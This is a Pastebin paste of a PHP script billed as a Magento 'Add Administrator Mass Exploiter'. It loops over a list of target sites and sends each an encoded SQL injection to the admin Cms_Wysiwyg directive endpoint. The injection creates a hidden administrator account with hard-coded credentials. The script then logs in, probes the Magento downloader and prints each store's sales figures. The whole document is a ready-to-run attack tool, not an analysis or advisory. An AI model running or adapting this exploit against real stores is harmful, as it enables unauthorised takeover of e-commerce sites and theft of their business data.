API tools faq
paste
Advertisement
AZZATSSINS_CYBERSERK

Magento Mass Exploiter

AZZATSSINS_CYBERSERK
Jul 20th, 2016
747
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.98 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. error_reporting(0);
  4. set_time_limit(0);
  5. $banner = '
  6.  #-----------------------------------------------------------#
  7.  #        Magento Add Administrator Mass Exploiter V.3       #
  8.  #                 Coded By Synchronizer                   #
  9.  #                 Recoded by AZZATSSINS        #
  10.  #-----------------------------------------------------------#
  11. ';
  12. function bersihkan($htmltags) {
  13.     $htmltags = str_replace('<span class="price">','',$htmltags);
  14.     $htmltags = str_replace('</span>','',$htmltags);
  15.     return $htmltags;
  16.    
  17. }
  18. $postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
  19. $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77";
  20. $postdwn = "username=hydra&password=hydra77";
  21. $pageadm = "/admin/Cms_Wysiwyg/directive/index/";
  22. $pagelog = "/admin/";
  23. $pagedwn = "/downloader/";
  24.  
  25. function stupid_CURL($url,$data,$page) {
  26. $ch = curl_init();
  27. curl_setopt ($ch, CURLOPT_URL, $url.$page);
  28. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  29. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  30. curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
  31. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  32. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  33. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  34. curl_setopt ($ch, CURLOPT_POST, 1);
  35. $headers  = array();
  36. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  37.  
  38. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  39. curl_setopt ($ch, CURLOPT_HEADER, 1);
  40. $result = curl_exec ($ch);
  41. curl_close($ch);
  42. return $result;
  43. }
  44. print $banner;
  45. $get=file_get_contents($argv[1])
  46. or die("
  47. \n\tError !
  48. \n\tusage => php file.php listarget.txt\n\n");
  49. $j=explode("\r\n",$get);
  50. foreach($j as $site){
  51.    
  52. print "\n\n\t=> Checking : ".$site;
  53. $hajar = stupid_CURL($site , $postadm, $pageadm);
  54.  
  55. if(preg_match('#200 OK#', $hajar)) {
  56.     $expres = "Success";
  57.     $ceklog = stupid_CURL($site , $postlog, $pagelog);
  58.    
  59. if(preg_match('#302 Moved#', $ceklog)) {
  60.     preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
  61.     foreach($match as $val)
  62.     {
  63.     $ltm = $val[0];
  64.     $avo = $val[1];
  65.     break;
  66.     }
  67.     $admlog = "Success";
  68.     $user = "hydra";
  69.     $pass = "hydra77";
  70.     $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
  71.     if(preg_match('#Return to Admin#', $cekdwn)) {
  72.     $dwnlog = "Login Success";
  73. }else {
  74.     $dwnlog = "Login Failed";
  75. }
  76. }else {
  77.     $admlog = "Failed";
  78.     $user = "NULL";
  79.     $pass = "NULL";
  80. }
  81. }else {
  82.     $admlog = "Failed";
  83.     $expres = "Failed";
  84.     $user = "NULL";
  85.     $pass = "NULL";
  86.     $dwnlog = "Login Failed";
  87.     $ltm = "NULL";
  88.     $avo = "NULL";
  89. }
  90. echo '
  91.     +---------------------------------------------+
  92.     +-------  Information Vulnerable Site  -------+
  93.     +---------------------------------------------+
  94.     | Exploiting    : '.$expres.'
  95.     | Login Admin   : '.$admlog.'
  96.     | Lifetime Sales: '.bersihkan($ltm).'
  97.     | Average Order : '.bersihkan($avo).'
  98.     | Downloader    : '.$dwnlog.'
  99.     | Username  : '.$user.'
  100.     | Password  : '.$pass.'
  101.     +---------------------------------------------+
  102. ';
  103. }
  104. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!